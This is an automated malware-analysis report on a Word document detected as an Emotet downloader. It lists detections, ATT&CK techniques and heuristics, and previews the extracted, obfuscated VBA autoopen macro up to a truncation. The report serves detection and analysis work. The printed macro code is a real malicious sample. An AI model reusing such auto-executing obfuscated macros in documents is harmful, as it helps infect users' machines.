MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with a specific Emotet signature. High-severity heuristics indicate the presence of auto-executing VBA macros, including the use of GetObject and WMI to launch processes. The VBA script, although obfuscated, likely facilitates the execution of a secondary payload, consistent with Emotet's behavior.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6942082-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6942082-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58751 bytes |
SHA-256: 8b3522cb1f68e76b7a0e6253bcbcb08fe8f393f124c27a6178817d811899605a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EkAAXAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mUCAZ1XB"
Attribute VB_Base = "0{16694029-35A0-43A6-BEE3-457F589E2D4D}{E88BC16E-5E4C-4D83-96B7-90DCF78AE2F1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AAZCUAcB"
Attribute VB_Base = "0{E810495C-D7FB-4977-A1D0-8839E2FD276F}{0D3C42FA-78CA-48FB-8817-B8244188C7CC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zxAowA"
Sub autoopen()
If lAG4CQ = sQwUZD Then
Select Case GAGQcQ
Case 508762488
GUAAABxA = 190419696
OkAZUo1o = cXAcQACA
m1UBAxAC = Asc(981736341 + Log(196187721 - Rnd(VABxwX)) / 844240778 + Oct(111019734))
Case 464814719
wBZXAA = PAcwxU
j4DAAAA = IQGQ1x
GAAQBw = CDate(782858085 - Cos(318379711 * Rnd(129490134) + 967422270 * 246634435) * r4AAAZDA / Round(111910574))
Case 337835668
EoUc1cAZ = iUABU4BA
SAAAUAkZ = CStr(398077495)
UCAAAU = Atn(320148561 + Atn(843031471) * wACCQB * CDate(ZAXGAU + 36 + M4wBQDU / CStr(oDDDXA)))
End Select
End If
If DZAXAAAQ = z_XoAZ Then
Select Case YCwoXBB
Case 664392449
QoUAkA = 662748381
GAXQDDUw = Zc_ZQXQ4
f4cXwX = Asc(605882810 + Log(343895722 - Rnd(BwAAAA1)) / 184685101 + Oct(863003627))
Case 771304559
iQADBUX = d_4AZAc
ZAAQBA = iDADAAQx
HkDwAB = CDate(783288910 - Cos(468116216 * Rnd(762989119) + 301119723 * 358753013) * OAU1UAkC / Round(789281521))
Case 12820256
qAwAADAQ = WQAABAUZ
J_AAxAA = CStr(849245303)
SDDADA = Atn(566204897 + Atn(644556852) * FoAAXA * CDate(iDB1wZ4A + 36 + pAAUGBZ / CStr(sBQXAQB)))
End Select
End If
UwB1UQwC
If ICCUAQ = fQUCADA Then
Select Case LkA4BUBA
Case 522038515
N_QDAQ = 777522849
zAAAAAQ = fBQGXAU
iQDAAxAA = Asc(142665408 + Log(14718154 - Rnd(ZBAQAD)) / 465370682 + Oct(763059741))
Case 337443544
TBAUQBAD = DXo_AoA
JQ_AkAoA = MQDAGAw
ZAoGUA = CDate(422122986 - Cos(391451164 * Rnd(40320197) + 37931278 * 904644653) * mUAAABQA / Round(665083796))
Case 413879902
UoUBXAGZ = KABA_UB
XAUQCA = CStr(354284327)
doAACGc = Atn(905138106 + Atn(700593001) * OwGQwXA_ * CDate(F4A1_B + 36 + nBACAC / CStr(tDXABcAc)))
End Select
End If
If DAk4ACDx = OAo1CAD Then
Select Case OxAZQAA
Case 815241942
vAAGU_QC = 333925864
FkBwBCA = XBXUAU
iUUA1DAG = Asc(122091247 + Log(777434450 - Rnd(UCQ_kXAA)) / 275770160 + Oct(952271384))
Case 961085550
z_AAQwU = SA_UAx1
IUAUZDA = pxGAAB
jXADBQG = CDate(801191006 - Cos(607008848 * Rnd(137599686) + 11020541 * 717538314) * wUZAoAAc / Round(989147099))
Case 16043676
uACUoA4A = jD4AcA
lBoADCAC = CStr(943392658)
hXAo4o = Atn(498288897 + Atn(868020224) * UkCZAD * CDate(wQDDA1 + 36 + zDcBCG / CStr(mCUwxA_)))
End Select
End If
If iDBAAZD = S4DGQAA Then
Select Case Gc4ABA4
Case 7646736
BcAAAGD = 448069444
tQGQQA4 = mkAAAAQ
aAA1A__ = Asc(542188858 + Log(630524136 - Rnd(BU4xBU)) / 614627097 + Oct(327344726))
Case 62855792
CQAAZQCc = oBA_ABXX
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.